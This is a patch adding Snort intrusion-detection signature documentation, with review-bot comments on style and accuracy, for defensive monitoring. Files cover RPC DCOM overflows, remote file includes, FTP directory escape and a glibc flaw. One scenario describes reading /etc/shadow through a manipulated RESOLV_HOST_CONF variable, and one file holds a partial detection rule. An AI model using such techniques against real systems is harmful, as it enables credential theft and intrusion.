+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2112.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+2112
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command RSET.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by
+sending a line feed character to a POP server via the RSET command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1939:
+http://www.faqs.org/rfcs/rfc1939.html
+
+--
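Review bot: Attack Scenarios reads "Simple.", which duplicates Ease of Attack instead of describing the scenario; Detailed Information already gives it ("sending a line feed character to a POP server via the RSET command"), so restate that here. There is no Affected Systems section, unlike the other signature files in this patch; name the POP server implementations the rule targets, and add the vendor advisory under Additional References, which currently lists only RFC 1939.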
--- /dev/null
+++ b/doc/signatures/100000923.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This detects traffic generated by a particular udp script installed on the serve
+r; this script is usually remotely installed via exploitable software.
+
+--
+Impact:
+The machine sending this traffic is potentially compromised.
+
+--
+Detailed Information:
+This rule detects traffic generated by a the "udp.pl" script installed on the se
+rver; this script is usually remotely installed via exploitable software.
+
+--
+Affected Systems:
+Any running vulnerable PHP programs.
+
+--
+Attack Scenarios:
+The udp.pl script is typically installed on a server through php fopen allowing 
+remote files to be downloaded/executed on the server side; files are normally ow
+ned by the web server user.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Examine the system in question for signs of a successful intrusion, including th
+e presence of a script named "udp.pl". If detected, restore the system from the 
+last known-good backup.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Sago Networks
+Dan Protich <dprotich@sagonet.com>
+
+--
+Additional References:
+
+--
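Review bot: the Sid field is empty (the line after "Sid:" is blank) even though the file is named 100000923.txt; fill in "100000923" so the documentation can be matched to the rule. The text has been hard-wrapped mid-word ("serve" / "r", "se" / "rver", "ow" / "ned", "th" / "e"), which reads as broken words in the rendered file; rewrap at word boundaries. Also "generated by a the "udp.pl" script" has a stray article, and Affected Systems ("Any running vulnerable PHP programs.") should read "Any system running vulnerable PHP programs."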
--- /dev/null
+++ b/doc/signatures/3250.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3250
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
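Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share") does not match the vulnerability described in Detailed Information, which is a malformed request to an RPC port causing a buffer overflow; the scenario text appears to have been copied from a different signature. Typo in Ease of Attack: "Expoit" should be "Exploit". Additional References is empty; the Microsoft Security Bulletin for this RPC DCOM issue should be cited. Note also that this file is word-for-word identical to 3207.txt, 3420.txt and 3323.txt in this patch; nothing in the Summary or Detailed Information says what distinguishes SID 3250 from the others.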
--- /dev/null
+++ b/doc/signatures/1008.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1008
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
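Review bot: the Summary ("exploit a potential weakness on a host running Microsoft Internet Information Server") does not say what the rule matches, so a reader cannot tell which request or file path triggers SID 1008; the other files in this patch name the script and parameter concerned. Style: "Sid: 1008" is on one line whereas every other file puts the number on its own line under "Sid:"; the Impact line "Information gathering possible administrator access." needs punctuation ("Information gathering; possible administrator access."); and "gain information on the IIS implementation on the host, this may be the prelude" is a comma splice.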
--- /dev/null
+++ b/doc/signatures/3207.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3207
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
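Review bot: this file is identical to 3250.txt in the same patch, down to the mismatched Attack Scenarios ("overly long filename via a network share"), the "Expoit" typo and the empty Additional References; see the comments there. At minimum the Summary or Detailed Information should state what SID 3207 detects that SID 3250 does not, otherwise the documentation gives an analyst no way to tell the two events apart.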
--- /dev/null
+++ b/doc/signatures/1416.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1416
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over UDP to a 
+broadcast address is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 162, tcp or udp.
+
+An attacker may attempt to send this request to determine if any devices
+are using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP Trap daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to udp port 162, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon on the responding IP addresses.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+--
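Review bot: comma splice and typo in Attack Scenarios: "An attacker sends a packet directed to udp port 162, if sucessful a reply is generated" should be "...to UDP port 162; if successful, a reply is generated". The Summary says the trap is sent to a broadcast address, but Detailed Information never mentions broadcast again; it should explain why the broadcast destination matters for the information-gathering impact claimed. Minor: "well known ports" should be hyphenated ("well-known"), and the two CAN entries under Additional References are labelled only "CVE"; a one-line description of each would help.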
--- /dev/null
+++ b/doc/signatures/2125.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2125
+
+--
+Summary:
+This event is generated when an attempt is made to escape the root directory of an FTP server. 
+
+--
+Impact:
+Information gathering possible system file disclosure.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running an FTP server vulnerable to an attack that allows the user to escape the FTP root directory.
+
+The attacker may be trying to gain information on the FTP implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+The ST FTP server from STSoft suffers from a vulnerability that can allow an attacker to access the filesystem on the host running the service.
+
+This event will also be generated by someone using Nessus to scan for this vulnerability.
+
+--
+Affected Systems:
+STSoft ST FTP Service 3.0
+
+--
+Attack Scenarios:
+The attacker is able to access the filesystem of the server using normal FTP commands.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the FTP implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the underlying operating system is fully patched.
+
+Check the host for signs of compromise.
+
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
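Review bot: the second and third paragraphs of Detailed Information ("gain information on the FTP implementation...", "gain administrator access to the host, garner information on users...") are generic text carried over from the IIS signature (1008.txt) and do not describe the directory-escape issue; the specific content is the STSoft ST FTP paragraph, which should lead. Impact ("Information gathering possible system file disclosure.") needs punctuation, and "on the host, this may be the prelude" is a comma splice. Additional References is empty even though a specific product and version (STSoft ST FTP Service 3.0) is named; cite the advisory. The last two Corrective Action items lack the trailing period the others have.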
--- /dev/null
+++ b/doc/signatures/3420.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3420
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
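Review bot: same text as 3250.txt and 3207.txt, including the Attack Scenarios paragraph about an "overly long filename via a network share" that does not describe an RPC buffer overflow, the "Expoit" typo in Ease of Attack and the empty Additional References. Please add a sentence to the Summary saying what SID 3420 matches that the other RPC DCOM SIDs in this patch do not.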
--- /dev/null
+++ b/doc/signatures/2423.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2423
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
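Review bot: Affected Systems has stray spaces inside version numbers: "RealOne Enterprise Desktop 6.0.11 .774" and "RealOne Player 6.0.11 .868" should read 6.0.11.774 and 6.0.11.868. The Summary says the rule fires on a download of "a file that may be an attack vector" without naming the file type or content the rule matches, so an analyst cannot tell what triggered the event; the other files in this patch name the script or command concerned. Additional References is empty for a vulnerability with a specific vendor advisory. Style: trailing space after "Simple." in Ease of Attack and no period after the Corrective Action sentence.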
--- /dev/null
+++ b/doc/signatures/1068.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1068
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
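Review bot: the Summary and Detailed Information are generic ("a known vulnerability on a web server or a web application") and never say which request SID 1068 matches; without that, the False Positives entry "None known" cannot be assessed. Typo in Impact: "attackers choosing" needs an apostrophe. Additional References is empty.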
--- /dev/null
+++ b/doc/signatures/3323.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3323
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
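Review bot: fourth copy of the 3250.txt text in this patch (3250, 3207, 3420, 3323), with the same mismatched Attack Scenarios, the same "Expoit" typo and the same empty Additional References. If the four SIDs cover different transports or request types, each Summary should say so; if they do not, the duplication should be resolved in the rules rather than documented four times.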
--- /dev/null
+++ b/doc/signatures/262.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+262
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
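Review bot: the Summary ("spurious DNS traffic") and Detailed Information ("abnormal DNS traffic") never say what property of the traffic the rule keys on, so an analyst has no basis for the "careful investigation" the text asks for; state the condition matched. Wording: "misrepresent an IP to host/name pairing" would be clearer as "misrepresent an IP address to hostname mapping", and the double spaces after periods in Impact and Attack Scenarios are inconsistent with the rest of the file. Additional References is empty; a DNS spoofing or DNSSEC reference would support the Corrective Action.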
--- /dev/null
+++ b/doc/signatures/2497.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2497
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
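Review bot: typo in Attack Scenarios: "An attcker" should be "An attacker". The comma in "SSL requests containing an invalid field, sent to vulnerable systems can cause" is misplaced; either drop it or bracket the clause ("...an invalid field, sent to vulnerable systems, can cause..."). The Impact block is missing the blank line before "--" that every other section in the file has, and the Corrective Action sentence lacks a period. Additional References is empty for a Microsoft-specific vulnerability; cite the security bulletin.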
--- /dev/null
+++ b/doc/signatures/714.txt
@@ -0,0 +1,90 @@
+Rule:  
+resolv_host_conf"; flow:to_server,established;
+content:"resolv_host_conf"; reference:arachnids,369;
+reference:url,www.securityfocus.com/bid/2181; classtype:attempted-admin;
+sid:714; rev:4;) 
+
+--
+
+Sid:
+
+714
+
+--
+
+Summary:
+
+The RESOLV_HOST_CONF variable is being manipulated on your Telnet host.
+
+--
+
+Impact:
+
+Elevated priviledges (file reads).
+
+--
+
+Detailed Information:
+
+The RESOLV_HOST_CONF variable, used by suid and sgid applications, isn't
+properly validated in some versions of glibc.  As a result, an attacker
+can use an suid or sgid root program to gain access to files they're not
+supposed to have.
+
+--
+
+Affected Systems:
+
+UNIX systems with unpatched glibc 2.1.x or 2.2.x implementations.
+
+--
+
+Attack Scenarios:
+
+Attacker sets the RESOLVE_HOST_CONF variable to the filename of any
+protected file (for example, /etc/shadow), and then runs an suid or sgid
+root program.  The contents of the protected file are then echoed to the
+console in a series of error messages.
+
+--
+
+Ease of Attack:
+
+Simple.
+
+--
+
+False Positives:
+
+None known.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Install the latest vendor-supplied glibc implementation.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS369
+
+Bugtraq:
+http://www.securityfocus.com/bid/2181
+
+
+--
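Review bot: the Rule field is a truncated rule body starting at `resolv_host_conf"; flow:to_server,established;` with the action, protocol, addresses and msg option missing; either include the complete rule or leave the field empty as the other files in this patch do, since a partial rule cannot be pasted into a rules file. Attack Scenarios refers to "RESOLVE_HOST_CONF" while the Summary and Detailed Information use "RESOLV_HOST_CONF"; the names must match, and the latter is the one the rule content looks for. Typo in Impact: "priviledges" should be "privileges".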
--- /dev/null
+++ b/doc/signatures/2041.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2041
+
+--
+Summary:
+The Extended Terminal Access Controller Access Control System (XTACACS) 
+is an authentication and authorization protocol derived from  CISCO 
+TACACS. It is used in TCP/IP networks where network servers authenticate
+clients from a master server.
+
+This event is generated when a failed login using XTACACS is observed.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to access 
+resources controlled by the XTACACS server.
+
+Multiple events from this rule may indicate the attempted enumeration of
+a valid user account using brute force methodology.
+
+--
+Detailed Information:
+When a user logs in to a server that uses XTACACS the server then makes 
+a request to a master server to determine the validity of the request. 
+The master server then verifies the login attempt and returns data 
+concerning that user which may include information regarding resources 
+the user is allowed access to in the form of an access list.
+
+--
+Affected Systems:
+All servers using XTACACS for authentication control.
+
+--
+Attack Scenarios:
+Regular user login method.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This rule may generate an event when a legitimate user supplies an
+incorrect password or username when logging in to a device.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+XTACACS servers should only authenticate to known hosts and firewall 
+rules should prevent access to XTACACS enabled servers from outside the 
+local area network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Information Library - Intel:
+http://www.intel.com/support/si/library/bi0414.htm
+
+The Internet Next Generation Project:
+http://ing.ctit.utwente.nl/WU5/D5.1/Technology/xtacacs/
+
+Xtacacs Home:
+http://www.netplex-tech.com/software/xtacacsd/
+
+--
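Review bot: Attack Scenarios ("Regular user login method.") does not describe a scenario; the Impact section already identifies the case of interest (multiple events suggesting brute-force enumeration of a valid account), so say that here. Minor: double space in "derived from  CISCO", and "Simple" under Ease of Attack lacks the period used elsewhere.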
--- /dev/null
+++ b/doc/signatures/2713.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2713
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure end_load
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
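Review bot: the sentence in Detailed Information is broken across lines at "vulnerability in the procedure end_load" / "." / "This procedure is included in" / "dbms_offline_og.", leaving a line that is just a period; join it to read "...in the procedure end_load. This procedure is included in dbms_offline_og." Affected Systems has a duplicated word: "Oracle Oracle9i". Style: "Rule: ", "Sid: " and several "-- " separators carry trailing whitespace, and the Corrective Action line lacks a period. Additional References is empty; the vendor alert for this overflow should be cited.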
--- /dev/null
+++ b/doc/signatures/100000854.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000854
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ListMessenger" application running on a webserver. Access to the file "listmessenger.php" using a remote file being passed as the "lm_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lm_path" parameter in the "listmessenger.php" script used by the "ListMessenger" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ListMessenger
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
